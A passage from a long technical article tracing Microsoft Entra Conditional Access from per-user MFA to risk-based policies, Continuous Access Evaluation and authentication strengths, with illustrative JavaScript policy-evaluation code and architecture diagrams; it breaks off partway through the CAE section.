The doctrine was settled by 2020. But Microsoft had already been trying to build a perimeter on identity for six years, starting in 2014 with a much smaller idea.

3. Per-user MFA and the limits of binary controls

In 2014, Microsoft's only cloud-era access control was a per-user toggle that said MFA: yes or MFA: no. The toggle worked. It was a real improvement over passwords alone. It also produced the most exploited security failure of the next decade: MFA fatigue [@weinert-2023-managed-policies].

How does a control improve security and create a new attack class at the same time?

The per-user MFA state machine

Per-user MFA lives on the user object as a tri-state: Disabled, Enabled, or Enforced. Microsoft Learn now says the quiet part out loud: "The best way to protect users with Microsoft Entra MFA is to create a Conditional Access policy" and "Don't enable or enforce per-user Microsoft Entra multifactor authentication if you use Conditional Access policies" [@ms-howto-mfa-userstates]. That guidance carries a generation of operational pain inside it. Mixing the two surfaces, in practice, produces unpredictable prompts: a CA policy says "no MFA required for this location," the per-user state says "always MFA," and the user gets prompted twice.

Note: Microsoft's explicit guidance is to pick one surface. If you have Entra ID P1 or higher, use Conditional Access. The per-user state should remain Disabled for those accounts. Mixed configurations produce both false-positive prompts and, occasionally, false-negative skips [@ms-howto-mfa-userstates].

Trusted IP rules: one-dimensional context

Office 365 added a second knob in the same era: "trusted IPs." Sign-ins from a configured public IP range would skip the MFA challenge [@ms-ca-network]. The idea was that "on the corporate network" meant "more trustworthy." This was reasonable in 2014. By 2017, it was already eroded by full-tunnel VPNs (every employee egresses through the corporate /16 from home), split-tunnel VPNs (some traffic does, some does not), and the realisation that "corporate network" had stopped being a useful synonym for "trusted." Trusted IP is one-dimensional context, and one dimension was not enough.

Security Defaults: the Free-SKU descendant

Since 22 October 2019, every new Entra ID tenant has Security Defaults turned on by default at creation [@ms-security-defaults]. Security Defaults is a tenant-wide on/off switch that requires MFA for all admin roles, MFA for users when they show risk, blocks legacy authentication, and forces MFA registration. Microsoft's number on the impact is striking: "more than 99.9% of those common identity-related attacks are stopped by using multifactor authentication and blocking legacy authentication" [@ms-security-defaults].

For Entra ID Free tenants in 2026, Security Defaults is still the only available baseline. There is no per-app policy, no per-risk gating, no Conditional Access. This is the licensing reality Section 10 returns to.

Active Directory Federation Services -- AD FS -- is the on-prem federation product that ran the access-control story before any of this. It is still operational in many tenants. It is no longer Microsoft's strategic identity provider; the Microsoft Learn AD FS overview now opens with the explicit guidance "Instead of upgrading to the latest version of AD FS, Microsoft highly recommends migrating to Microsoft Entra ID" [@ms-ad-fs-overview]. AD FS claim rules functioned as a kind of policy engine, but they evaluated only at federation time and they had no concept of risk.

The four failure modes of the binary toggle

The first-generation controls -- per-user MFA, trusted IPs, Security Defaults -- share four documented limits:

No expression of context. The toggle is either on or off. It cannot say "MFA from a new country but not from the office."
Trusted IP is thin context. A public IP range is one bit of information; modern attacks include matching network egress.
No per-app policy. The toggle applies to all apps the user accesses. You cannot say "MFA for the admin portal, not for Outlook."
No exclusion semantics for break-glass accounts. Emergency-access accounts need to be reachable when everything else has failed. The binary toggle either includes them or excludes them; it does not let you say "exclude these accounts but log every sign-in as a high-priority alert."

MFA fatigue: when a control becomes a credential

The canonical failure of the binary toggle is push-bombing. The attacker has the password. The system requires MFA. The user gets four "approve sign-in?" notifications during a morning meeting. One gets a thumbs-up by reflex. The system did exactly what it was configured to do.

The attack works because the control has no concept of whether this is a normal sign-in. The same flow runs whether the request originates from the user's office WiFi or an anonymizing proxy in another country. The MFA challenge carries no risk-weighted information; the user has no signal that this prompt is different from yesterday's prompt. Fatigue is the consequence. Microsoft's own Entra blog catalogued the attack pattern and the operational mitigations in the wake of the 2022 incident cluster [@ms-techcom-mfa-fatigue].

Focusing on password rules, rather than things that can really help -- like multi-factor authentication (MFA), or great threat detection -- is just a distraction. -- Alex Weinert, Microsoft Identity, July 2019 [@weinert-2019-password]

Weinert's 2019 piece is now infamous in the identity community for its title alone -- "Your Pa$$word doesn't matter." The argument was that a password's composition rules carry no information that helps the system tell a real user from an attacker; what does carry information is context. The system needed a place to put that context.

If MFA yes/no cannot express context, the next step is obvious: make context the input. But to make context the input, the system needs a place to put it. The history of CA from 2015 forward is the history of giving context a home.

4. Generation by generation

The next eight years produced six generations of access control, each one closing a specific failure of the previous one. They look like product launches in a marketing chronology. They are something more interesting: a sequence of negative results, each followed by a positive engineering response.

Conditional Access timeline:
2014: Gen 1, per-user MFA and trusted IPs
2015: CA enters public preview
2016: Gen 2, Conditional Access general availability
2016: ID Protection enters preview
2018: Gen 3, risk-based CA conditions broadly available
2020: CAE enters preview
2022: Gen 4, Continuous Access Evaluation general availability
2023: Gen 5, CA for workload identities
2023: Gen 6, Microsoft-managed policies and Authentication Strengths
2026: CA for AI agent identities

The 2026 milestone -- Conditional Access for AI agent identities -- is itself still emerging; Microsoft's current framing in the Conditional Access Optimization Agent announcement names it explicitly as a frontier rather than a finished generation [@ms-techcom-ca-optimization-agent]. Section 9.1 returns to the open problems.

Gen 1 (2014 to 2016): per-user MFA

Documented in Section 3. The control has no concept of context. The failure motivates Gen 2.

Gen 2 (September 2016 GA): Conditional Access with static rules

The September 27, 2016 CloudBlogs post announcing CA general availability framed it as "Protect your data at the front door" -- the "front door" framing that Microsoft documentation still uses [@ms-techcom-ca-frontdoor-2016]. The policy schema (users + cloud apps + conditions to grants) was introduced in the 2015 preview [@ms-techcom-ca-preview-2015] and survived essentially unchanged into 2016 GA.

Gen 2 closed Gen 1's failure mode: context now had a home. A policy could match on network location, on the app being accessed, on the user's group membership, on the device platform. It could express "block country X" or "require MFA when not on the corporate network."

The remaining documented limit: no risk feed. The engine could express what to check for but not whether this specific sign-in looks suspicious. A policy could block credential-stuffing attempts only if you happened to know in advance which IPs to deny. Motivated Gen 3.

Gen 3 (2017 to 2018): risk-based fusion

Identity Protection had been generating risk signals since its March 2016 preview. Through 2017 and 2018, two new condition keys appeared in the CA policy schema: signInRiskLevels and userRiskLevels. Both take values from the set low, medium, high. The risk feed plugged into the policy plane through exactly two keys. The legacy ID-Protection-side risk policies (which were a parallel policy surface inside ID Protection itself) are now retiring on 1 October 2026; the canonical surface is CA [@ms-id-protection-policies].

The remaining limit: pre-issuance only. The CA evaluator runs at sign-in time. Once a token is issued, the policy plane has no way to undo the decision until the token expires. Microsoft's own retrospective is honest about what they tried first: "Microsoft experimented with the 'blunt object' approach of reduced token lifetimes but found they degrade user experiences and reliability without eliminating risks" [@ms-cae-concept]. A one-hour token cuts the worst-case revocation latency to an hour, but it also means a user with intermittent connectivity gets prompted every hour, and a mobile app with retry storms can hammer the IdP. The trade-off was unacceptable. Motivated Gen 4.

Gen 4 (January 2022 GA): Continuous Access Evaluation

CAE inverted the trade-off. Instead of shortening the token, lengthen it -- up to 28 hours [@ms-cae-concept]. Then add a side channel: when a critical event fires (account disabled, password reset, high user risk, IP location change), the resource API issues an HTTP 401 with a WWW-Authenticate claims challenge, and the client replays to Entra for a fresh token. Latency on the side channel is bounded: "up to 15 minutes" for non-IP events, "instant" for IP locations [@ms-cae-concept]. CAE was tied to an emerging open standard from day one, the OpenID Continuous Access Evaluation Profile [@ms-cae-concept]. The general-availability announcement landed on 10 January 2022 [@ms-techcom-cae-ga-2022].

Remaining limit: applies to humans only. Service principals do not consume CAE-aware client libraries; they cannot perform a claims challenge. Motivated Gen 5.

Gen 5 (2023 GA): Conditional Access for workload identities

Same engine, constrained grant set. The Microsoft Learn page is blunt on the boundaries: "Workload Identities Premium licenses are required" and the constraint set is unusual -- "Policy can be applied to single tenant service principals that are registered in your tenant. Microsoft and third-party SaaS applications, including multitenant apps, are not covered by these policies. Managed identities aren't covered by policy" and "Under Grant, Block access is the only available option" [@ms-workload-identity-ca]. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product followed in late November 2022, and the Conditional Access feature for workload identities itself reached general availability later in 2023.

The single-tenant restriction is a structural choice. Multi-tenant SaaS apps appear in many tenants' service principal directories at once; policy scoping on them would require a cross-tenant resolution protocol the engine does not have. Managed identities are excluded because they belong to Azure subscriptions, not to user identity, and Microsoft has chosen not to extend the surface there. Group assignments do not work either: "Conditional Access policies assigned to a group that contains a service principal are not enforced for that service principal" [@ms-workload-identity-ca].

Remaining limit: under-configured in most tenants because the grant taxonomy is so narrow that admins do not see immediate value. Motivated Gen 6.

Gen 6 (November 2023 onwards): Microsoft-managed policies and Authentication Strengths

In November 2023, Alex Weinert announced Microsoft-managed Conditional Access policies: a set of baselines that Microsoft would auto-deploy into tenants in Report-only mode and then auto-enable after a waiting period [@weinert-2023-managed-policies]. The launch announcement specified a 90-day window [@helpnet-2023-microsoft-entra-policies]. The current Microsoft Learn documentation specifies "Microsoft enables these policies no less than 45 days after they're introduced in your tenant if they're left in the Report-only state" with a 28-day pre-enablement notification [@ms-managed-policies].

The window shrank deliberately. The 90-day window in the 2023 launch announcement was a calibration window; the 45-day window in current documentation is the post-calibration setting. Both numbers are correct in their respective time frames. The article uses the current number throughout.

Parallel to the managed policies, Microsoft shipped Authentication Strengths -- a named bundle of acceptable authentication methods that can be required as a grant. The three built-in strengths are MFA strength, Passwordless MFA strength, and Phishing-resistant MFA strength (FIDO2 security key, Windows Hello for Business, multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the modern way to express "no adversary-in-the-middle phishing kit should be able to defeat this grant."

The pattern: extension, not replacement

From Gen 3 onward, each generation extends the prior schema rather than replacing it. The conditionalAccessPolicy JSON shape that shipped in 2016 still drives the engine in 2026 -- with new condition keys added, new grant types added, new session controls added. By the standards of cloud control surfaces, that is a long run without a rewrite.

The reason is the architectural decision the next section is about.

5. The two-plane separation

The breakthrough is not a model, not a token format, not a wire protocol. It is a separation: the signal plane that produces risk detections from the policy plane that consumes them.

Stated like that, it sounds banal. Read it the other direction -- a policy engine whose risk model can change without changing the policy semantics, and whose policy can change without retraining the model -- and it is the design that makes the system maintainable at trillions of daily signals across hundreds of thousands of tenants.

The two planes, precisely

The signal plane is Microsoft Entra ID Protection. It runs detection logic on every interactive sign-in (and, for offline detections, on historical sign-ins) and emits a riskDetection resource into a per-tenant log on Microsoft Graph at /identityProtection/riskDetections. Each detection carries five fields you care about: riskEventType (one of about two dozen named detection types like anonymizedIPAddress, leakedCredentials, unlikelyTravel), riskLevel (low, medium, high, plus the bookkeeping values hidden and none), riskState (atRisk, confirmedCompromised, dismissed, remediated), detectionTimingType (realtime, nearRealtime, offline), and additionalInfo (a JSON blob with user-agent, IP, alert URL, reason codes) [@ms-graph-riskdetection][@ms-id-protection-risks].
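To make those fields concrete, here is a minimal sketch that filters a handful of detections down to the ones still open at or above a chosen level. The records are invented for illustration; only the field names and enum values come from the description above, and `openDetections` is a hypothetical helper, not a Graph API call.

```javascript
// Hypothetical detections; only the field names and enum values come from the text.
const sampleDetections = [
  { riskEventType: 'anonymizedIPAddress', riskLevel: 'medium',
    riskState: 'atRisk', detectionTimingType: 'realtime' },
  { riskEventType: 'leakedCredentials', riskLevel: 'high',
    riskState: 'atRisk', detectionTimingType: 'offline' },
  { riskEventType: 'unlikelyTravel', riskLevel: 'high',
    riskState: 'remediated', detectionTimingType: 'offline' },
  { riskEventType: 'unfamiliarFeatures', riskLevel: 'hidden',
    riskState: 'atRisk', detectionTimingType: 'realtime' },
];

// Ordering used only for comparison. The bookkeeping values 'hidden' and
// 'none' are not in the list, so they never pass a threshold.
const RISK_ORDER = ['low', 'medium', 'high'];

// Return detections that are still open (atRisk) at or above minLevel.
function openDetections(detections, minLevel) {
  const floor = RISK_ORDER.indexOf(minLevel);
  if (floor < 0) throw new Error('unknown risk level: ' + minLevel);
  return detections.filter((d) =>
    d.riskState === 'atRisk' && RISK_ORDER.indexOf(d.riskLevel) >= floor);
}

const open = openDetections(sampleDetections, 'medium');
console.log(open.map((d) => d.riskEventType));
```

The remediated and hidden records drop out, which is the behaviour a triage view would usually want.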

The policy plane is Conditional Access. It is a JSON object at /identity/conditionalAccess/policies/{id} on the Graph API [@ms-graph-capolicy]. Each policy has displayName, state (enabled, disabled, enabledForReportingButNotEnforced), conditions, grantControls, and sessionControls. The conditions block contains the per-policy targeting: which users, which apps, which platforms, which network locations -- and two condition keys named signInRiskLevels and userRiskLevels.

**Sign-in risk** is a per-sign-in estimate of how likely it is that the credential is being used by someone other than its legitimate owner *at this moment*. **User risk** is a per-user estimate of how likely it is that the account itself has been compromised over its recent history. A user with leaked credentials in a breach corpus carries persistent user risk until the password is reset; a user signing in from an anonymizing proxy carries sign-in risk for that session. CA policies can match on either, both, or neither. Risk-based conditions require Entra ID P2 [@ms-id-protection-policies].

Those two condition keys -- signInRiskLevels and userRiskLevels -- are the entire API surface between the signal plane and the policy plane. Everything else about ID Protection is hidden behind them. The policy plane does not know whether high came from a transformer or a logistic regression or a hardcoded rule. The signal plane does not know which policies will read its output. The contract is two strings.
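A small sketch of that contract, under stated assumptions: the policy object uses the field names described above with an invented display name, and `riskConditionsMatch` is a hypothetical stand-in for the evaluator's risk check. Treating an empty array as "this policy does not condition on that risk" is an assumption of the sketch.

```javascript
// Field names follow the conditionalAccessPolicy shape described in the text;
// the display name and chosen values are illustrative.
const riskPolicy = {
  displayName: 'Require MFA on risky sign-ins',
  state: 'enabledForReportingButNotEnforced',
  conditions: {
    signInRiskLevels: ['medium', 'high'],
    userRiskLevels: [],
  },
  grantControls: { builtInControls: ['mfa'] },
};

// The policy side reads two level strings and nothing else. It never sees
// which detector fired or how the level was computed.
function riskConditionsMatch(conditions, signIn) {
  const ok = (levels, actual) => levels.length === 0 || levels.includes(actual);
  return ok(conditions.signInRiskLevels, signIn.signInRisk) &&
         ok(conditions.userRiskLevels, signIn.userRisk);
}

console.log(riskConditionsMatch(riskPolicy.conditions, { signInRisk: 'high', userRisk: 'none' }));
console.log(riskConditionsMatch(riskPolicy.conditions, { signInRisk: 'low', userRisk: 'high' }));
```

Nothing in the matcher refers to a `riskEventType`, so the detection logic can change without the policy object changing.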

flowchart LR
    subgraph SP[Signal plane Entra ID Protection]
        DET[Detection pipeline]
        RD[(riskDetection log)]
        RL[Risk level low medium high]
    end
    subgraph PP[Policy plane Conditional Access]
        EV[Policy evaluator]
        POL[(conditionalAccessPolicy JSON)]
        TOK[Token issuer]
    end
    subgraph SES[Session plane CAE]
        CH[Critical event channel]
        RP[Resource API]
    end
    DET --> RD
    DET --> RL
    RL -. signInRiskLevels userRiskLevels .-> EV
    POL --> EV
    EV --> TOK
    TOK -- access token --> RP
    DET -. user risk events .-> CH
    CH -. 401 insufficient claims .-> RP

Why the separation matters

Three concrete consequences fall out of the design:

The risk model is re-trainable without policy rewrites. Microsoft's ID Protection team can change the underlying detection algorithm tomorrow. Add a new riskEventType. Replace the classifier for unlikelyTravel. Re-tune the threshold that maps a score to low/medium/high. None of these require tenants to rewrite their CA policies, because policies match on the level, not the signal.

Tenants without the licence simply do not use the risk conditions. An Entra ID P1 tenant can deploy CA policies that match on users, apps, locations, devices, client apps, and platforms. P2 unlocks the risk conditions. The schema accommodates both: P1 policies just leave the risk arrays empty. There is no parallel policy surface for the non-risk-aware tenants; they use the same engine.

CAE is a third plane layered onto the same skeleton. Continuous Access Evaluation did not require redesign of the policy plane. The CAE channel is a new event delivery mechanism; the events it propagates are things the signal plane already knew about (high user risk, password reset, account disabled) plus new ones the policy plane introduced (network-location-policy changed). The architecture absorbed CAE because the design was already a separation of concerns.

Key idea: The signal plane and the policy plane are separable; the contract between them is two condition keys (signInRiskLevels and userRiskLevels). That is what makes the system maintainable across a decade of evolution.

The "pit of success" framing

Alex Weinert calls this the "pit of success." His November 2023 piece on Microsoft-managed policies put the metric on it: a decade ago Microsoft turned on a "radical" tenant-wide policy requiring MFA for every consumer Microsoft account, and "today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication" [@weinert-2023-managed-policies].

The 100 percent number is achievable because the policy plane and the signal plane can each evolve independently. Microsoft can ship a managed policy that says "require MFA for high-risk sign-ins" without committing to a fixed definition of "high risk." The definition lives on the signal plane and changes weekly. The policy lives on the policy plane and is stable for years.

With the separation as the spine, the next section walks the end-to-end pipeline in one continuous trace, from signal to grant to token to session, on a real sign-in -- the trace no public Microsoft document assembles in one place.

6. The end-to-end pipeline

Take Alice's Tuesday morning from Section 1 and walk it forward. This section has six subsections. By the end of them, the question "who decided?" has six independently sourced answers and one combined picture.

6.1 What the signal plane sees

Identity Protection's detection taxonomy splits into five rough groups, based on what kind of information triggered the detection. The canonical taxonomy is the Microsoft Learn page on risk types [@ms-id-protection-risks]; the wire-format enum on the Graph schema is at [@ms-graph-riskdetection].

Network signals. anonymizedIPAddress, maliciousIPAddress, nationStateIP, riskyIPAddress. The signal is the source IP and reputation databases that ID Protection ingests.
Behavioural signals. unlikelyTravel, mcasImpossibleTravel, newCountry, unfamiliarFeatures, anomalousUserActivity. The signal is a deviation from the tenant's or the user's historical baseline.
Credential signals. leakedCredentials, passwordSpray. The signal is a match against a corpus of breached credentials or a velocity-based pattern across tenants.
Token and session signals. anomalousToken, tokenIssuerAnomaly, attemptedPrtAccess, attackerinTheMiddle, authenticatorPhishing. The signal is on the token itself or on the way the authenticator flow ran.
Inbox behaviour. suspiciousInboxForwarding, mcasSuspiciousInboxManipulationRules. The signal is on what happened after the sign-in -- a post-compromise indicator that retroactively flags the sign-in that enabled it.
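The five groups above can be captured as a lookup table, which is handy when bucketing detections in a report. This is a sketch: the group keys are hypothetical labels, the membership lists are copied from the list above, and anything not listed falls into `unclassified`.

```javascript
// Group membership copied from the list above; the group keys are illustrative.
const DETECTION_GROUPS = {
  network: ['anonymizedIPAddress', 'maliciousIPAddress', 'nationStateIP', 'riskyIPAddress'],
  behavioural: ['unlikelyTravel', 'mcasImpossibleTravel', 'newCountry',
    'unfamiliarFeatures', 'anomalousUserActivity'],
  credential: ['leakedCredentials', 'passwordSpray'],
  tokenAndSession: ['anomalousToken', 'tokenIssuerAnomaly', 'attemptedPrtAccess',
    'attackerinTheMiddle', 'authenticatorPhishing'],
  inbox: ['suspiciousInboxForwarding', 'mcasSuspiciousInboxManipulationRules'],
};

// Invert the table into a riskEventType -> group lookup.
const GROUP_OF = new Map(
  Object.entries(DETECTION_GROUPS).flatMap(([group, types]) =>
    types.map((type) => [type, group]))
);

// Detection types added later simply fall through to 'unclassified'.
function groupOf(riskEventType) {
  return GROUP_OF.get(riskEventType) ?? 'unclassified';
}

console.log(groupOf('leakedCredentials'));
console.log(groupOf('someFutureDetection'));
```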

Each detection is also tagged with a timing: real-time, near-real-time, or offline. Microsoft Learn is precise about the latencies: "Detections triggered in real-time take 5-10 minutes to surface details in the reports. Offline detections take up to 48 hours" [@ms-risk-detection-types].

The detection is mapped to a risk level, not a probability. Microsoft Learn calls the level "calculated by our machine learning algorithms" and explicitly notes the meaning: low/medium/high "represent how confident Microsoft is that one or more of the user's credentials are known by an unauthorized entity" [@ms-risk-detection-types]. "Confidence" here is meant in the everyday sense, not the strict statistical sense of a confidence interval. Microsoft has not published a calibration study that would let you map a "high" risk level to a frequentist probability of compromise.

The figure you sometimes see in Microsoft marketing materials -- "more than 100 trillion signals processed per day" [@ms-managed-policies], or, in older sources, "78 trillion" [@ms-id-protection-overview] -- is the aggregate signal volume across all tenants and product surfaces, not per-sign-in features per user. The article keeps the two carefully separate.

Microsoft has not publicly disclosed the production model architecture, the feature vector size, or per-detection precision and recall. The 2021 Microsoft Security Blog interview with Maria Puertas Calvo describes the existence of the ML team and the operational scale ("hundreds of terabytes every day") but stops well short of architecture details [@ms-puertas-calvo-interview]. The model class is publicly unspecified; the taxonomy and the operating output are both public.

6.2 How risk surfaces

Two parallel logs matter for risk. The Sign-in log is the universe: every interactive and non-interactive sign-in produces an entry. The riskDetections log is the sparse overlay: a riskDetection is emitted only when a detection fires for the sign-in. Most sign-ins produce a Sign-in log entry with no corresponding riskDetection. Only flagged sign-ins do [@ms-graph-riskdetection].

This is a common source of confusion. It is tempting to assume "ID Protection scored every sign-in," and in a sense it did -- the detectors ran -- but the durable artefact exists only when at least one detector fired. To compute a per-sign-in distribution of risk you need to join the Sign-in log with the riskDetections log and treat the unjoined rows as "no risk flagged at the moment of issuance."
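The join described above can be sketched in a few lines. Everything here is illustrative: the rows are invented, joining the sign-in's `id` to the detection's `requestId` is an assumption to verify against your own logs, and taking the highest level among a sign-in's detections is a convenience of this sketch, not Microsoft's aggregation rule.

```javascript
// Hypothetical rows from the two logs.
const signIns = [
  { id: 'req-1', user: 'alice@contoso.com' },
  { id: 'req-2', user: 'bob@contoso.com' },
  { id: 'req-3', user: 'alice@contoso.com' },
];
const riskDetections = [
  { requestId: 'req-2', riskEventType: 'anonymizedIPAddress', riskLevel: 'medium' },
  { requestId: 'req-2', riskEventType: 'unfamiliarFeatures', riskLevel: 'high' },
];

const LEVELS = ['none', 'low', 'medium', 'high'];

// Left join: every sign-in survives; unjoined rows get riskLevel 'none'.
function joinRisk(signInRows, detectionRows) {
  const byRequest = new Map();
  for (const d of detectionRows) {
    const list = byRequest.get(d.requestId) ?? [];
    list.push(d);
    byRequest.set(d.requestId, list);
  }
  return signInRows.map((s) => {
    const hits = byRequest.get(s.id) ?? [];
    const riskLevel = hits.reduce(
      (max, d) => (LEVELS.indexOf(d.riskLevel) > LEVELS.indexOf(max) ? d.riskLevel : max),
      'none'
    );
    return { ...s, detections: hits.length, riskLevel };
  });
}

// Count sign-ins per level to get the per-sign-in distribution.
function distribution(joinedRows) {
  const counts = {};
  for (const row of joinedRows) counts[row.riskLevel] = (counts[row.riskLevel] ?? 0) + 1;
  return counts;
}

const joined = joinRisk(signIns, riskDetections);
console.log(distribution(joined));
```

An inner join would silently drop the unflagged sign-ins and make the tenant look far riskier than it is, which is why the sketch keeps every sign-in row.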

There is one more wrinkle. The detection taxonomy on the Microsoft Learn concept page and the riskEventType enum on the Graph schema are not perfectly aligned. The concept page lists mcasImpossibleTravel and authenticatorPhishing as named detection types; the Graph enum lists impossibleTravel (without the mcas prefix). The two surfaces sometimes use different value names for the same logical detection -- a UI display string versus a Graph enum value. Detection engineers writing KQL against the Sign-in logs should account for both.

6.3 How CA consumes risk

Conditional Access evaluation runs in a fixed order: assignments are checked first (does this sign-in match this policy at all?), then conditions (do all the condition predicates hold?), then grants (which controls are demanded?), then session controls (which token lifetime, sign-in frequency, persistent browser).

The key semantic, repeated across the Microsoft Learn documentation: a block grant in any policy matching the sign-in overrides any allow grant in any other policy. The policy plane is not just additive; it has an explicit precedence rule.

flowchart TD
    A[Sign-in request] --> B[First-factor auth]
    B --> C[Enumerate matching policies]
    C --> D{Any policy matches?}
    D -- No --> E[Default allow with token]
    D -- Yes --> F[Evaluate conditions per policy]
    F --> G{Block grant in any match?}
    G -- Yes --> H[Deny access return error]
    G -- No --> I[Aggregate required grants]
    I --> J{All grants satisfied?}
    J -- No --> K[Issue challenge MFA or device]
    J -- Yes --> L[Apply session controls]
    L --> M[Issue access token]

The pseudocode below is a compressed restatement of that flow. It is not Microsoft source code; it is the algorithmic shape an admin should keep in their head when reading a policy or debugging a sign-in.

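{`
// Illustrative stand-ins so the sketch runs end to end. A real tenant holds many
// policies, and real matching logic is far richer than these one-liners.
const allPolicies = [
  {
    state: 'enabled',
    conditions: { users: { includeUsers: ['All'] }, signInRiskLevels: [] },
    grantControls: { builtInControls: ['mfa', 'compliantDevice'] },
    sessionControls: { signInFrequency: { value: 8, type: 'hours' } },
  },
];
const matchesAssignments = (c, s) =>
  c.users.includeUsers.includes('All') || c.users.includeUsers.includes(s.user);
const matchesConditions = (c, s) =>
  c.signInRiskLevels.length === 0 || c.signInRiskLevels.includes(s.signInRisk);
const mergeSessionControls = (controls) => Object.assign({}, ...controls);

function evaluate(signin) {
  // Only enforced policies count: disabled and report-only policies are skipped.
  const matching = allPolicies.filter(p =>
    p.state === 'enabled' &&
    matchesAssignments(p.conditions, signin) &&
    matchesConditions(p.conditions, signin)
  );

  // Block precedence: any block grant wins
  if (matching.some(p => p.grantControls.builtInControls.includes('block'))) {
    return { decision: 'DENY', reason: 'block grant matched' };
  }

  // Aggregate required grants across matching policies
  const requiredGrants = new Set();
  for (const p of matching) {
    for (const g of p.grantControls.builtInControls) requiredGrants.add(g);
    if (p.grantControls.authenticationStrength) {
      requiredGrants.add('authStrength:' + p.grantControls.authenticationStrength.id);
    }
  }

  const missing = [...requiredGrants].filter(g => !signin.satisfies(g));
  if (missing.length > 0) {
    return { decision: 'CHALLENGE', missing };
  }

  // Apply session controls (token lifetime, sign-in frequency, persistent browser)
  const session = mergeSessionControls(matching.map(p => p.sessionControls));
  return { decision: 'ALLOW', session };
}

const result = evaluate({
  user: 'alice@contoso.com',
  app: 'Office365 Exchange Online',
  location: { ip: '203.0.113.42', country: 'PT' },
  device: { compliant: true, joinType: 'Entra' },
  signInRisk: 'low',
  userRisk: 'none',
  satisfies(grant) {
    const mfa = ['mfa', 'authStrength:phishingResistantMfa'];
    return mfa.includes(grant) || grant === 'compliantDevice';
  },
});
console.log(JSON.stringify(result, null, 2));
`}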

Risk-based conditions require Entra ID P2 [@ms-id-protection-overview]. Without that licence, the signInRiskLevels and userRiskLevels arrays in a policy are ignored. The rest of the engine works the same.

6.4 The grants

Each policy declares a set of grants. Within a policy the grants combine under the policy's operator: AND requires every listed control, OR requires any one of them. Across policies, every matching policy must be satisfied, and a block grant in any matching policy takes precedence over allow grants in any other policy. Here are the grants currently in the schema:

| Grant | What it requires | Notes |
| --- | --- | --- |
| `block` | Deny access. | Always wins against allow grants. |
| `mfa` | Any MFA method registered for the user. | The legacy generic-MFA grant; replaced in modern deployments by Authentication Strength. |
| `requireAuthenticationStrength` | A named bundle of acceptable methods. | The modern grant. Built-in strengths include phishing-resistant [@ms-auth-strengths]. |
| `compliantDevice` | The device record has `isCompliant: true`. | Set by Intune or a third-party compliance partner. |
| `domainJoinedDevice` | Hybrid Azure AD joined device. | Requires Entra Connect on-prem trust. |
| `approvedApplication` | Use an approved client app. | A small allow-list of Microsoft mobile apps. |
| `compliantApplication` | An app under an Intune App Protection Policy. | Mobile app management. |
| `passwordChange` | User must change their password. | Used for password-leaked recovery. |
| `requireTermsOfUse` | User must accept a terms-of-use document. | Used for compliance and guest scenarios. |

**Authentication Strength** is a named, ordered bundle of acceptable authentication methods that a CA grant can demand. The three built-in strengths are *MFA strength* (any registered second factor), *Passwordless MFA strength* (no password used), and *Phishing-resistant MFA strength* (FIDO2 security key, Windows Hello for Business or a platform credential, or multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the canonical modern grant for high-value access.

The Authentication Strength grant is where the phishing-resistance story lives in 2026. A policy that demands the phishing-resistant strength refuses to accept TOTP or SMS or push as the second factor. Only credentials with cryptographic binding to the device or hardware token will satisfy the grant. That class of credential, by construction, cannot be replayed by an adversary-in-the-middle phishing kit -- because the underlying WebAuthn ceremony is bound to the origin of the relying party.
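As a rough illustration of that acceptance rule, the sketch below checks whether the methods used in a sign-in satisfy a phishing-resistant requirement. The method identifiers are hypothetical labels chosen for readability, not Graph enum values, and the set contents follow the methods named in the text.

```javascript
// Hypothetical method labels; the membership follows the methods named above.
const PHISHING_RESISTANT_METHODS = new Set([
  'fido2SecurityKey',
  'windowsHelloForBusiness',
  'certificateBasedMfa',
]);

// A sign-in satisfies the strength only if at least one method it used is in
// the phishing-resistant set. TOTP, SMS, and push never qualify.
function satisfiesPhishingResistant(methodsUsed) {
  return methodsUsed.some((method) => PHISHING_RESISTANT_METHODS.has(method));
}

console.log(satisfiesPhishingResistant(['password', 'totp']));
console.log(satisfiesPhishingResistant(['fido2SecurityKey']));
```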

6.5 The Windows-side handoff

PRT issuance is an interactive sign-in. It goes through CA like any other.

**Primary Refresh Token (PRT)**: a long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-Entra-joined devices. The PRT is bound to the device's TPM where one is available, and it grants the user single sign-on to all CA-targeted apps from that Windows session. Issuance is subject to CA evaluation; if a CA policy demands compliant device, the device must already be marked `isCompliant` before the PRT is issued.

The compliance state lands on the device object as isCompliant. Intune (or a third-party MDM through Intune's compliance-partner API) writes that field after evaluating the device against a compliance policy: disk encrypted, OS patched, antivirus running, jailbreak detection clean, and so on. CA reads it on subsequent policy evaluations. If a policy requires compliantDevice and the device object says isCompliant: false, the grant is not satisfied.

The operational seam to on-prem Active Directory runs the other direction. Kerberos and NTLM against on-prem domain controllers never consult Entra. The Microsoft Learn CA overview is explicit: CA is a cloud control plane; on-prem authentication is outside its scope [@ms-ca-overview]. This is the limit Section 8 will name precisely.

6.6 CAE in session

The third plane. Wire format lives in two Microsoft Learn pages: the claims-challenge page [@ms-claims-challenge] and the app-resilience CAE page [@ms-app-resilience-cae].

A client opts in to CAE by advertising the cp1 capability via the xms_cc claim in token requests. In MSAL, that opt-in looks like WithClientCapabilities(new[] { "cp1" }) [@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page says it cleanly: "The only currently known value is cp1" [@ms-claims-challenge].
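Client libraries normally build this for you, but it helps to see what the opt-in looks like as data. The sketch below assembles a `claims` request parameter that carries the capability. The JSON layout mirrors the claims-request format as described on the claims-challenge page; treat the exact layout as an assumption to verify there. `claimsParameter` is a hypothetical helper.

```javascript
// Build the claims request parameter that advertises client capabilities.
// If the caller already has a claims JSON string, the capability is merged in
// alongside it rather than replacing it.
function claimsParameter(capabilities, existingClaimsJson) {
  const claims = existingClaimsJson ? JSON.parse(existingClaimsJson) : {};
  claims.access_token = {
    ...(claims.access_token ?? {}),
    xms_cc: { values: capabilities },
  };
  return JSON.stringify(claims);
}

console.log(claimsParameter(['cp1']));
```

Merging matters because a client that already holds a claims string must still advertise `cp1` on the same token request.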

When the policy plane sees a critical event after the token was issued, the resource API responds to the next call with HTTP 401 Unauthorized and a WWW-Authenticate header of the shape:

HTTP/1.1 401 Unauthorized
